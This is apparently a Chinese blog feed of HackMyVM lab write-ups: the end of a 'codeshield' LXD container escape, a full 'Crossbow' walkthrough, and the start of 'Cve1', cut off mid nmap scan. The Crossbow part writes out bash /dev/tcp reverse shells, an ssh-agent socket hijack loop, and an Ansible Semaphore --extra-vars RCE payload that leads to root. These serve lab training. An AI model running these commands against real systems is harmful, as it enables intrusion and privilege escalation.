|

| plain # codeshield earlyp@codeshield:~$ cd /tmp earlyp@codeshield:/tmp$ wget http://192.168.0.106:8888/alpine-v3.23-x86_64-20260112_0553.tar.gz earlyp@codeshield:/tmp$ lxc image import ./alpine*.tar.gz --alias myimage If this is your first time running LXD on this machine, you should also run: lxd init To start your first container, try: lxc launch ubuntu:22.04 Or for a virtual machine: lxc launch ubuntu:22.04 --vm Image imported with fingerprint: cd73881adaac667ca3529972c7b380af240a9e3b09730f8c8e4e6a23e1a7892b earlyp@codeshield:/tmp$ lxd init Would you like to use LXD clustering? (yes/no) [default=no]: Do you want to configure a new storage pool? (yes/no) [default=yes]: Name of the new storage pool [default=default]: Name of the storage backend to use (dir, lvm, zfs, btrfs, ceph, cephobject) [default=zfs]: Create a new ZFS pool? (yes/no) [default=yes]: Would you like to use an existing empty block device (e.g. a disk or partition)? (yes/no) [default=no]: Size in GiB of the new loop device (1GiB minimum) [default=9GiB]: Would you like to connect to a MAAS server? (yes/no) [default=no]: Would you like to create a new local network bridge? (yes/no) [default=yes]: What should the new bridge be called? [default=lxdbr0]: What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: Would you like the LXD server to be available over the network? (yes/no) [default=no]: Would you like stale cached images to be updated automatically? (yes/no) [default=yes]: Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: earlyp@codeshield:/tmp$ earlyp@codeshield:/tmp$ lxc init myimage mycontainer -c security.privileged=true Creating mycontainer earlyp@codeshield:/tmp$ lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true Device mydevice added to mycontainer earlyp@codeshield:/tmp$ lxc start mycontainer earlyp@codeshield:/tmp$ lxc exec mycontainer /bin/sh ~ # whoami;id;pwd root uid=0(root) gid=0(root) /root ~ # ls -la total 3 drwx------ 2 root root 3 May 30 08:09 . drwxr-xr-x 19 root root 19 May 30 08:08 .. -rw------- 1 root root 21 May 30 08:09 .ash_history ~ # cd /mnt/root /mnt/root # ls -la total 4005969 drwxr-xr-x 19 root root 4096 Aug 22 2023 . drwxr-xr-x 3 root root 3 May 30 08:08 .. lrwxrwxrwx 1 root root 7 Aug 10 2023 bin -> usr/bin drwxr-xr-x 4 root root 4096 Aug 23 2023 boot drwxr-xr-x 20 root root 4240 May 30 06:20 dev drwxr-xr-x 164 root root 12288 Aug 30 2023 etc drwxr-xr-x 14 root root 4096 Aug 26 2023 home lrwxrwxrwx 1 root root 7 Aug 10 2023 lib -> usr/lib lrwxrwxrwx 1 root root 9 Aug 10 2023 lib32 -> usr/lib32 lrwxrwxrwx 1 root root 9 Aug 10 2023 lib64 -> usr/lib64 lrwxrwxrwx 1 root root 10 Aug 10 2023 libx32 -> usr/libx32 drwx------ 2 root root 16384 Aug 22 2023 lost+found drwxr-xr-x 3 root root 4096 May 30 08:07 media drwxr-xr-x 2 root root 4096 Aug 10 2023 mnt drwxr-xr-x 7 root root 4096 Aug 26 2023 opt dr-xr-xr-x 368 root root 0 May 30 06:17 proc drwx------ 9 root root 4096 Aug 26 2023 root drwxr-xr-x 50 root root 1380 May 30 06:51 run lrwxrwxrwx 1 root root 8 Aug 10 2023 sbin -> usr/sbin drwxr-xr-x 12 root root 4096 Aug 30 2023 snap drwxr-xr-x 3 root root 4096 Aug 22 2023 srv -rw------- 1 root root 4102029312 Aug 22 2023 swap.img dr-xr-xr-x 13 root root 0 May 30 06:17 sys drwxrwxrwt 25 root root 4096 May 30 08:09 tmp drwxr-xr-x 14 root root 4096 Aug 10 2023 usr drwxr-xr-x 16 root root 4096 Aug 26 2023 var /mnt/root # cd root /mnt/root/root # ls -la total 96 drwx------ 9 root root 4096 Aug 26 2023 . drwxr-xr-x 19 root root 4096 Aug 22 2023 .. -rw------- 1 root root 26 May 30 07:53 .bash_history -rw-r--r-- 1 root root 3106 Oct 15 2021 .bashrc drwx------ 2 root root 4096 Aug 28 2023 .cache drwxr-xr-x 3 root root 4096 Aug 26 2023 .iredmail drwx------ 3 root root 4096 Aug 23 2023 .launchpadlib -rw------- 1 root root 20 Aug 23 2023 .lesshst drwxr-xr-x 3 root root 4096 Aug 22 2023 .local -r-------- 1 root root 45 Aug 26 2023 .my.cnf -rw-r--r-- 1 root root 91 Aug 26 2023 .my.cnf-amavisd -rw-r--r-- 1 root root 92 Aug 26 2023 .my.cnf-fail2ban -rw-r--r-- 1 root root 93 Aug 26 2023 .my.cnf-iredadmin -rw-r--r-- 1 root root 91 Aug 26 2023 .my.cnf-iredapd -rw-r--r-- 1 root root 93 Aug 26 2023 .my.cnf-roundcube -r-------- 1 root root 89 Aug 26 2023 .my.cnf-vmail -r-------- 1 root root 94 Aug 26 2023 .my.cnf-vmailadmin -rw-r--r-- 1 root root 161 Jul 9 2019 .profile -rw-r--r-- 1 root root 66 Aug 26 2023 .selected_editor drwx------ 2 root root 4096 Aug 22 2023 .ssh -rw-r--r-- 1 root root 0 Aug 22 2023 .sudo_as_admin_successful -rw-r--r-- 1 root root 290 Aug 26 2023 .wget-hsts drwxr-xr-x 2 root root 4096 Aug 26 2023 cowrie -rw-r--r-- 1 root root 2528 Aug 26 2023 root.txt drwx------ 4 root root 4096 Aug 22 2023 snap /mnt/root/root # cat root.txt @@@ @@@@@@@@@ @@@@@@ @@@@@@@@@@@@@@ (@@ @@@@@@@@@@@@@@ @@ ██████╗ ██████╗ ██████╗ ███████╗███████╗██╗ ██╗██╗███████╗██╗ ██████╗ @@@@@@@@@@@@@@ @@ ██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔════╝██║ ██║██║██╔════╝██║ ██╔══██╗ @@@@@@@@@@@@@ @@ ██║ ██║ ██║██║ ██║█████╗ ███████╗███████║██║█████╗ ██║ ██║ ██║ @@@@@@@@@@@@@ @@@ ██║ ██║ ██║██║ ██║██╔══╝ ╚════██║██╔══██║██║██╔══╝ ██║ ██║ ██║ @@@@@@@@@@@ @@ ╚██████╗╚██████╔╝██████╔╝███████╗███████║██║ ██║██║███████╗███████╗██████╔╝ @@@@@@@@@@ @@@ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚══════╝╚═╝ ╚═╝╚═╝╚══════╝╚══════╝╚═════╝ @@@@@@@ @@@ @@@@@@@ _______________________________________________________________________________________________________ | _ROOT FLAG!________________________________________________________________________________________ | | | | | | | Educate_your_employees_on_password_safety | | | | | | | |___________________________________________________________________________________________________| | |_______________________________________________________________________________________________________| | | --- |

同样可以拿到shell！

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hmvmachines/codeshield/

HMV-Crossbow

呼啸山庄 — Mon, 12 Jan 2026 00:00:00 GMT

信息收集

ip定位

┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l | grep "08:00:27"
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
192.168.0.105   08:00:27:9f:6c:53       (Unknown)

nmap扫描

┌──(root㉿kali)-[/home/kali]
└─# nmap -Pn -sTCV -T4 -p0-65535 192.168.0.105
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-11 10:18 EST
Nmap scan report for 192.168.0.105
Host is up (0.00071s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
| ssh-hostkey: 
|   256 dd:83:da:cb:45:d3:a8:ea:c6:be:19:03:45:76:43:8c (ECDSA)
|_  256 e5:5f:7f:25:aa:c0:18:04:c4:46:98:b3:5d:a5:2b:48 (ED25519)
80/tcp   open  http        Apache httpd 2.4.57 ((Debian))
|_http-server-header: Apache/2.4.57 (Debian)
|_http-title: Polo's Adventures
9090/tcp open  zeus-admin?
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 400 Bad request
|     Content-Type: text/html; charset=utf8
|     Transfer-Encoding: chunked
|     X-DNS-Prefetch-Control: off
|     Referrer-Policy: no-referrer
|     X-Content-Type-Options: nosniff
|     Cross-Origin-Resource-Policy: same-origin
|     X-Frame-Options: sameorigin
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <title>
|     request
|     </title>
|     <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <style>
|     body {
|     margin: 0;
|     font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
|     font-size: 12px;
|     line-height: 1.66666667;
|     color: #333333;
|     background-color: #f5f5f5;
|     border: 0;
|     vertical-align: middle;
|_    font-weight: 300;
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9090-TCP:V=7.94SVN%I=7%D=1/11%Time=6963BF65%P=x86_64-pc-linux-gnu%r
SF:(GetRequest,DB1,"HTTP/1\.1\x20400\x20Bad\x20request\r\nContent-Type:\x2
SF:0text/html;\x20charset=utf8\r\nTransfer-Encoding:\x20chunked\r\nX-DNS-P
SF:refetch-Control:\x20off\r\nReferrer-Policy:\x20no-referrer\r\nX-Content
SF:-Type-Options:\x20nosniff\r\nCross-Origin-Resource-Policy:\x20same-orig
SF:in\r\nX-Frame-Options:\x20sameorigin\r\n\r\n29\r\n<!DOCTYPE\x20html>\n<
SF:html>\n<head>\n\x20\x20\x20\x20<title>\r\nb\r\nBad\x20request\r\nc2c\r\
SF:n</title>\n\x20\x20\x20\x20<meta\x20http-equiv=\"Content-Type\"\x20cont
SF:ent=\"text/html;\x20charset=utf-8\">\n\x20\x20\x20\x20<meta\x20name=\"v
SF:iewport\"\x20content=\"width=device-width,\x20initial-scale=1\.0\">\n\x
SF:20\x20\x20\x20<style>\n\tbody\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20margin:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20font-family:\x20\"RedHatDisplay\",\x20\"Open\x20Sans\",\x20Helveti
SF:ca,\x20Arial,\x20sans-serif;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20font-size:\x2012px;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20line-height:\x201\.66666667;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20color:\x20#333333;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20background-color:\x20#f5f5f5;\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0}\n\x20\x20\x20\x20\x20\x20\x20\x20img\x20{\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20border:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20vertical-align:\x20middle;\n\x20\x20\x20\x20\x20\x20\x20
SF:\x20}\n\x20\x20\x20\x20\x20\x20\x20\x20h1\x20{\n\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20font-weight:\x20300;\n\x20\x20\x20\x20\x20\x20
SF:\x20\x20}\n\x20\x20\x20\x20\x20\x20\x20\x20p\x20")%r(HTTPOptions,DB1,"H
SF:TTP/1\.1\x20400\x20Bad\x20request\r\nContent-Type:\x20text/html;\x20cha
SF:rset=utf8\r\nTransfer-Encoding:\x20chunked\r\nX-DNS-Prefetch-Control:\x
SF:20off\r\nReferrer-Policy:\x20no-referrer\r\nX-Content-Type-Options:\x20
SF:nosniff\r\nCross-Origin-Resource-Policy:\x20same-origin\r\nX-Frame-Opti
SF:ons:\x20sameorigin\r\n\r\n29\r\n<!DOCTYPE\x20html>\n<html>\n<head>\n\x2
SF:0\x20\x20\x20<title>\r\nb\r\nBad\x20request\r\nc2c\r\n</title>\n\x20\x2
SF:0\x20\x20<meta\x20http-equiv=\"Content-Type\"\x20content=\"text/html;\x
SF:20charset=utf-8\">\n\x20\x20\x20\x20<meta\x20name=\"viewport\"\x20conte
SF:nt=\"width=device-width,\x20initial-scale=1\.0\">\n\x20\x20\x20\x20<sty
SF:le>\n\tbody\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20margi
SF:n:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-family:\
SF:x20\"RedHatDisplay\",\x20\"Open\x20Sans\",\x20Helvetica,\x20Arial,\x20s
SF:ans-serif;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-size:\
SF:x2012px;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20line-height:\
SF:x201\.66666667;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20color:
SF:\x20#333333;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20backgroun
SF:d-color:\x20#f5f5f5;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x
SF:20\x20\x20\x20\x20img\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20border:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ver
SF:tical-align:\x20middle;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x2
SF:0\x20\x20\x20\x20\x20h1\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20font-weight:\x20300;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x2
SF:0\x20\x20\x20\x20\x20\x20p\x20");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 144.88 seconds

目录扫描

┌──(root㉿kali)-[/home/kali]
└─# dirsearch -u http://192.168.0.105/

  _|. _ _  _  _  _ _|_    v0.4.3                     
 (_||| _) (/_(_|| (_| )                              
                                                     
Extensions: php, aspx, jsp, html, js
HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/reports/http_192.168.0.105/__26-01-11_10-27-29.txt

Target: http://192.168.0.105/

[10:27:29] Starting:                                 
[10:27:31] 403 -  278B  - /.ht_wsr.txt
[10:27:31] 403 -  278B  - /.htaccess.orig
[10:27:31] 403 -  278B  - /.htaccess.bak1
[10:27:31] 403 -  278B  - /.htaccess_extra
[10:27:31] 403 -  278B  - /.htaccess.sample
[10:27:31] 403 -  278B  - /.htaccess.save
[10:27:31] 403 -  278B  - /.htaccess_sc
[10:27:31] 403 -  278B  - /.htaccess_orig
[10:27:31] 403 -  278B  - /.htaccessOLD2
[10:27:31] 403 -  278B  - /.htaccessBAK
[10:27:31] 403 -  278B  - /.htaccessOLD
[10:27:31] 403 -  278B  - /.htm
[10:27:31] 403 -  278B  - /.html
[10:27:31] 403 -  278B  - /.httr-oauth
[10:27:31] 403 -  278B  - /.htpasswd_test
[10:27:31] 403 -  278B  - /.htpasswds
[10:27:32] 403 -  278B  - /.php
[10:27:42] 200 -  378B  - /app.js
[10:27:46] 200 -  267B  - /config.js
[10:28:10] 403 -  278B  - /server-status
[10:28:10] 403 -  278B  - /server-status/

┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u http://192.168.0.105/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x php,txt,html,zip,db,bak,js -t 64
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.0.105/
[+] Method:                  GET
[+] Threads:                 64
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              db,bak,js,php,txt,html,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 5205]
/.html                (Status: 403) [Size: 278]
/.php                 (Status: 403) [Size: 278]
/app.js               (Status: 200) [Size: 760]
/config.js            (Status: 200) [Size: 321]
/.php                 (Status: 403) [Size: 278]
/.html                (Status: 403) [Size: 278]
/server-status        (Status: 403) [Size: 278]
Progress: 1764472 / 1764480 (100.00%)
===============================================================
Finished
===============================================================

document.addEventListener("DOMContentLoaded", function() {
    fetch(API_ENDPOINT, {
        headers: {
            "Authorization": `Bearer ${API_KEY}`
        }
    })
    .then(response => response.json())
    .then(data => {
        if (data && Array.isArray(data.messages)) {
            const randomMessage = data.messages[Math.floor(Math.random() * data.messages.length)];

            const messageElement = document.createElement("blockquote");
            messageElement.textContent = randomMessage;
            messageElement.style.marginTop = "20px";
            messageElement.style.fontStyle = "italic";

            const container = document.querySelector(".container");
            container.appendChild(messageElement);
        }
    });
});

const API_ENDPOINT = "https://phishing.crossbow.hmv/data";
const HASH_API_KEY = "49ef6b765d39f06ad6a20bc951308393";

// Metadata for last system upgrade
const SYSTEM_UPGRADE = {
    version: "2.3.1",
    date: "2023-04-15",
    processedBy: "SnefruTools V1",
    description: "Routine maintenance and security patches"
}

可以发现/config.js中出现了域名

利用hosts添加

192.168.0.105 phishing.crossbow.hmv

没啥思路

先hash解密49ef6b765d39f06ad6a20bc951308393

解密地址:https://md5hashing.net/hash/snefru

解密结果为ELzkRudzaNXRyNuN6

尝试在9090端口登录

polo/ELzkRudzaNXRyNuN6

渗透测试

终端登录

登录进去了

点击终端

尝试利用ssh连接

┌──(root㉿kali)-[/home/kali]
└─# ssh polo@192.168.0.105 
The authenticity of host '192.168.0.105 (192.168.0.105)' can't be established.
ED25519 key fingerprint is SHA256:TCA/ssXFaEc0sOJl0lvYyqTVTrCpkF0wQfyj5mJsALc.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:19: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.0.105' (ED25519) to the list of known hosts.
polo@192.168.0.105's password: 
Permission denied, please try again.

权限不允许

反弹shell

bash -c 'exec bash -i &>/dev/tcp/192.168.0.106/1234 <&1'

sudo pwncat -l 1234

提权-pedro

信息收集

polo@crossbow:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
Debian-exim:x:100:102::/var/spool/exim4:/usr/sbin/nologin
messagebus:x:101:103::/nonexistent:/usr/sbin/nologin
sshd:x:102:65534::/run/sshd:/usr/sbin/nologin
lea:x:1000:1000::/home/lea:/bin/bash
polo:x:1001:1001:,,,:/home/polo:/bin/bash
polkitd:x:996:996:polkit:/nonexistent:/usr/sbin/nologin
mysql:x:103:106:MySQL Server,,,:/nonexistent:/bin/false
_rpc:x:104:65534::/run/rpcbind:/usr/sbin/nologin
statd:x:105:65534::/var/lib/nfs:/usr/sbin/nologin
gluster:x:106:107::/var/lib/glusterd:/usr/sbin/nologin
cockpit-ws:x:107:113::/nonexistent:/usr/sbin/nologin
cockpit-wsinstance:x:108:114::/nonexistent:/usr/sbin/nologin
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
pedro:x:1002:1002::/home/pedro:/bin/sh

polo@crossbow:/$ cd /tmp
polo@crossbow:/tmp$ ls
dbus-aOzC2qT5og  ssh-XXXXXXcE94FH  ssh-XXXXXXvsuvXX
polo@crossbow:/tmp$ file *
dbus-aOzC2qT5og:  socket
ssh-XXXXXXcE94FH: directory
ssh-XXXXXXvsuvXX: directory
polo@crossbow:/tmp$ cd ssh-XXXXXXcE94FH/
bash: cd: ssh-XXXXXXcE94FH/: Permission denied
polo@crossbow:/tmp$ cd ssh-XXXXXXvsuvXX/
polo@crossbow:/tmp/ssh-XXXXXXvsuvXX$ ls -la
total 8
drwx------ 2 polo polo 4096 Apr  3 12:44 .
drwxrwxrwt 4 root root 4096 Apr  3 12:44 ..
srw------- 1 polo polo    0 Apr  3 12:44 agent.1259046
polo@crossbow:/tmp/ssh-XXXXXXvsuvXX$ file agent.1259046 
agent.1259046: socket

1️⃣ `/tmp/dbus-CXcuU0fprd`

dbus-CXcuU0fprd: socket

这是 DBus 会话 socket
👉 常见于桌面/系统服务
👉 99% 对提权没用，可以忽略

2️⃣ `/tmp/ssh-XXXXXXb5kQzw/agent.945466`

agent.945466: socket

🔥 重点来了

这是：

SSH Agent Socket（ssh-agent）

说明什么？

当前系统上，有一个 SSH agent 正在运行

而且它的 socket 暴露在 /tmp 下，被你看到

ssh-agent解释

SSH_AUTH_SOCK=/tmp/ssh-XXXXXXcE94FH/agent.1089  ssh lea@192.168.0.105

第一张图在说什么？

它在描述一个正常工作的场景：

Alice 从自己电脑 → 登录到 bastion → 再跳到 server

用人话就是：

Alice 自己电脑上有一把钥匙（ssh-agent）

她做了这句：

ssh -A alice@bastion

意思是：

“我登录 bastion 的时候，把我电脑里的钥匙也一起带过去。”

于是发生了三件事：

1️⃣ Alice 电脑上的 ssh-agent 还在她电脑上
2️⃣ bastion 上创建了一个 “远程插口”

/tmp/ssh-xxxx/agent.1676

3️⃣ bastion 里的 shell 通过这个插口，可以用 Alice 的钥匙

所以 Alice 在 bastion 上执行：

ssh server.internal

虽然 bastion 本地没有钥匙
但通过这个插口
可以让 Alice 电脑上的钥匙帮忙开门

第二张图就是你现在干的事 😈

它在讲一个攻击场景。

现在多了一个人：

Mallory（你）

你在 bastion（也就是你现在的 crossbow）上有 shell。

你看到了：

/tmp/ssh-xxxx/agent.1676

你做的事情是：

SSH_AUTH_SOCK=/tmp/ssh-xxxx/agent.1676 ssh server.internal

翻成人话：

“嘿 ssh，别用我的钥匙
用这个插在 Alice 身上的那根 U 盾”

SSH 就真的用了 Alice 的钥匙
你就以 Alice 的身份登录进了 server

你没有密码
你没有私钥
你只是借用了一个已经被授权的钥匙

┌──(root㉿kali)-[/home/kali]
└─# pwncat -l 1234

polo@crossbow:/$ SSH_AUTH_SOCK=/tmp/ssh-XXXXXXcE94FH/agent.1089  ssh lea@192.168.0.105
SSH_AUTH_SOCK=/tmp/ssh-XXXXXXcE94FH/agent.1089  ssh lea@192.168.0.105
Pseudo-terminal will not be allocated because stdin is not a terminal.

根据反馈得知该shell缺少tty

什么是tty

TTY = 你和 Linux 交互用的“真实终端”

就是：
有没有一个“键盘 + 屏幕”那样的交互通道。

❌ 假终端（non-TTY）
只有 stdin/stdout
没有终端控制能力

它只是个管道，不是一个真正的终端。

没有 TTY，你会遇到这些：

行为	结果
sudo	不能输密码
ssh	不能交互
su	直接失败
vim / nano	直接崩
top / less	乱码
Ctrl+C	失效

python3 -c 'import pty; pty.spawn("/bin/bash")'

登录爆破

polo@crossbow:/home/lea$ SSH_AUTH_SOCK=/tmp/ssh-XXXXXXLi1PX1/agent.1089 ssh lea@192.168.0.105
lea@192.168.0.105's password: 

Permission denied, please try again.
lea@192.168.0.105's password: 

Permission denied, please try again.
lea@192.168.0.105's password: 

lea@192.168.0.105: Permission denied (publickey,password).
polo@crossbow:/home/lea$            


尝试爆破
for i in {1040..1140}; do SSH_AUTH_SOCK=/tmp/ssh-XXXXXXLi1PX1/agent.$i  ssh pedro@192.168.0.105; done

解释“因为 pedro 的 ssh-agent 被 ssh -A 转发进了 lea 的 SSH 会话，所以它的 socket 被挂载在 lea 的 /tmp/ssh-XXXX 目录下。PID 是 sshd 动态生成的，因此只能枚举。”

关键事实 1

**/tmp/ssh-XXXXXXLi1PX1** 这个目录是 sshd 创建的

它不是 “lea 的钥匙目录”
它是：

“lea 登录 crossbow 时，sshd 给她开的 agent 转发通道”

这个目录的名字属于 lea 会话
但里面的 socket 可以指向任何被转发过来的 agent

关键事实 2

当 pedro 用 **ssh -A** 经过 lea → crossbow 时

真实链路是：

pedro 的 ssh-agent
   ↓（加密转发）
lea 的 ssh 会话
   ↓（再转发）
crossbow 的 sshd

sshd 会把 pedro 的 agent 挂在：

/tmp/ssh-XXXXXXLi1PX1/agent.<随机pid>

所以你看到的是：

pedro 的 agent
被“挂”在了 lea 的目录里

这就是你能在 lea 的目录里爆出 pedro 的原因。

为什么 PID 要爆？

因为 sshd 创建 socket 时用的是：

agent.<sshd fork 出来的 pid>

不是 pedro 的 PID
不是 lea 的 PID
是 sshd 当时 fork 的子进程 PID

这个你没法提前知道
只能枚举

爆破成功的真实原因是：

你在：

/tmp/ssh-XXXXXXLi1PX1/

这个“lea 会话的 agent 目录”里
枚举到了一个：

agent.1xxx

这个 socket 实际上连接的是：

pedro 的 ssh-agent（被转发进来）

你用它去连：

ssh pedro@192.168.0.105

就等于用 pedro 自己电脑上的钥匙去开门。

提权-root

查看端口连接情况

发现不明连接

127.0.0.1:3000

╭─pedro@crossbow ~ 
╰─$ curl 127.0.0.1:3306
curl: (1) Received HTTP/0.9 when not allowed
╭─pedro@crossbow ~ 
╰─$ curl 127.0.0.1:3000                                                                                                                                 1 ↵
<!DOCTYPE html>
<html lang="en">
  <head>
    <base href="/">
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width,initial-scale=1.0">
    <link rel="icon" href="favicon.png">
    <title>Ansible Semaphore</title>
  <script defer type="module" src="js/chunk-vendors.66355ca7.js"></script><script defer type="module" src="js/app.b2fc4bb2.js"></script><link href="css/chunk-vendors.e1031f37.css" rel="stylesheet"><link href="css/app.13f6f466.css" rel="stylesheet"><script defer src="js/chunk-vendors-legacy.b392e67e.js" nomodule></script><script defer src="js/app-legacy.cefb5b9b.js" nomodule></script></head>
  <body>
    <noscript>
      <strong>
          We're sorry but web doesn't work properly
          without JavaScript enabled. Please enable it to continue.
      </strong>
    </noscript>
    <div id="app"></div>
    <!-- built files will be auto injected -->
  </body>
</html>

╭─pedro@crossbow ~ 
╰─$ find / -name semaphore -type f 2>/dev/null
/usr/bin/semaphore

╭─pedro@crossbow ~ 
╰─$ semaphore
Ansible Semaphore is a beautiful web UI for Ansible.
Source code is available at https://github.com/ansible-semaphore/semaphore.
Complete documentation is available at https://ansible-semaphore.com.
Usage:
  semaphore [flags]
  semaphore [command]
Available Commands:
  completion  generate the autocompletion script for the specified shell
  help        Help about any command
  migrate     Execute migrations
  server      Run in server mode
  setup       Perform interactive setup
  upgrade     Upgrade to latest stable version
  user        Manage users
  version     Print the version of Semaphore
Flags:
      --config string   Configuration file path
  -h, --help            help for semaphore
Use "semaphore [command] --help" for more information about a command.

看一下版本：

╭─pedro@crossbow ~ 
╰─$ semaphore version
v2.8.90

google 一下：

找到攻击方式：

[Attack Vectors]
 
The --extra-vars parameter can be abused by a malicious user with low privileges to achieve Remote Command Execution (RCE) and read files and configurations, perform Server Side Request Forgery (SSRF), execute commands, and establish a reverse shell on the ansible server. Payload:
 
{"ansible_user": "{{ lookup('ansible.builtin.pipe', \"bash -c 'exec bash -i &>/dev/tcp/127.0.0.1/1337 <&1'\") }}"}

进行一下端口转发，否则我们看不到那个 UI：
socat TCP-LISTEN:3001,fork TCP:127.0.0.1:3000

尝试弱密码和万能密码，admin:admin 登录进去了。

然后设置环境变量：

sudo pwncat -l 9999 2>/dev/null

报错了

ERROR: Ansible could not initialize the preferred locale: unsupported locale setting

没有设置地区，设置一下：

{
    "LC_ALL":"en_US.UTF-8",
    "LANG":"en_US.UTF-8"
}

重新运行

root@crossbow:/home/pedro# cat user.txt
cat user.txt
58cb1e1bdb3a348ddda53f22ee7c1613

cat root.txt
7a299c41b1daac46d5ab98745b212e09

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hmvmachines/crossbow/

HMV-Cve1

呼啸山庄 — Mon, 12 Jan 2026 00:00:00 GMT

信息收集

IP定位

┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l | grep "08:00:27"
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
192.168.0.107   08:00:27:8b:20:d4       (Unknown)

nmap信息收集

┌──(root㉿kali)-[/home/kali]
└─# nmap -Pn -sTCV -T4 -p0-65535 192.168.0.107
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-11 23:36 EST
Nmap scan report for 192.168.0.107
Host is up (0.00060s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
